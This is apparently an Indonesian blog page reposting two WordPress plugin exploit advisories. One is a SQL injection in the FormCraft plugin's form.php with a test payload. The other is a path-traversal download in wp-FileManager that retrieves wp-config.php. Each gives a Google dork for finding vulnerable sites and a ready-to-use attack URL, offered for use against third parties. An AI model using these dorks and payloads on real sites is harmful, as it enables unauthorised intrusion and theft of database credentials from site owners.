Tampilkan postingan dengan label Wordpress. Tampilkan semua postingan
Tampilkan postingan dengan label Wordpress. Tampilkan semua postingan

Selasa, 31 Desember 2013

Wordpress formcraft Plugin Sql Injection


Exploit Author : Ashiyane Digital Security Team
Vuln. Plat.: Web Application
Tested on.: Windows , Linux
Date.: 2013/12/2
=============================================


Google Dork : inurl:/wp-content/plugins/formcraft


Exploit : Sql Injection
 Location1 :
[Target]/wp-content/plugins/formcraft/form.php?id=[Sql]

A PoC: form.php?id=1%20and%20 1=1

tested me :D

oke sekian dari Clound tentang formcraft Plugin Wordpress


Share:

Wordpress wp-FileManager Local File Download Vulnerability

Author: ByEge
Download: http://wordpress.org/extend/plugins/wp-filemanager/
Vuln. Plat.:  Web Application
Test Platform :  Linux
==============================================


Exploit Note :
In order for this to work, the "Allow Download" setting must be checked in the FileManager's settings.

Google Dorks :
inurl:wp-content/plugins/wp-filemanager/

Test :
http://server/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download


Oke,sekian dari Clound


Share: